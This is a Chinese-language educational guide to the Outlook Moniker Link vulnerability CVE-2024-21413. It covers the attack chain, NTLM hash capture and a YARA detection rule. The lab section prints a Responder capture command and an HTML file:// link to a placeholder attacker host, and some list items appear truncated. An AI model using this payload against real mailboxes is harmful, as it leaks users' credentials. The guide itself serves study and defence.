关于 CVE-2024-21413(Outlook 零点击 Moniker Link 漏洞)的教育指南,涵盖攻击流程、NTLM 凭据捕获、使用 YARA 检测和缓解策略。
CVE-2024-21413,通常称为 Moniker Link 漏洞,是 Microsoft Outlook 中的一个严重安全缺陷,使攻击者能够无需任何交互即可泄露用户凭据。
与传统的网络钓鱼攻击不同,此漏洞只需预览电子邮件即可触发,使其在企业环境中尤其危险。
问题源于 Outlook 处理 moniker 链接的方式,导致向攻击者控制的系统发起意外的身份验证尝试。
理解以下概念至关重要:
一种 Windows 特有的机制,允许应用程序使用以下协议引用外部资源:
file://unc://\\attacker-server\share
用于通过网络访问共享资源。在该漏洞中,它被滥用以强制身份验证请求。
Outlook 的受保护视图旨在隔离潜在不安全的内容。 此漏洞绕过了该保护,允许访问外部资源。
构造有效载荷
file://attacker-server/share)。投递
触发
自动处理
身份验证请求
凭据泄露
[Attacker]
|
| 1. Send crafted email
v
[Victim Outlook]
|
| 2. Auto-process moniker link
v
[Windows System]
|
| 3. NTLM authentication attempt
v
[Attacker Server]
|
| 4. Capture NTLM hash
v
[Credential Abuse / Lateral Movement]
⚠️ 仅在受控实验室环境中执行
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
Florian Roth 开发了一条检测规则,用于识别涉及 moniker 链接的利用尝试。
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// 和基于 UNC 的链接CVE-2024-21413 展示了深度集成的系统行为(如自动身份验证)如何通过看似无害的输入(如电子邮件链接)被利用。
💡 建议: 在虚拟实验室(例如 Windows VM + 攻击者 VM)中重现此漏洞,以充分理解攻击链和防御策略。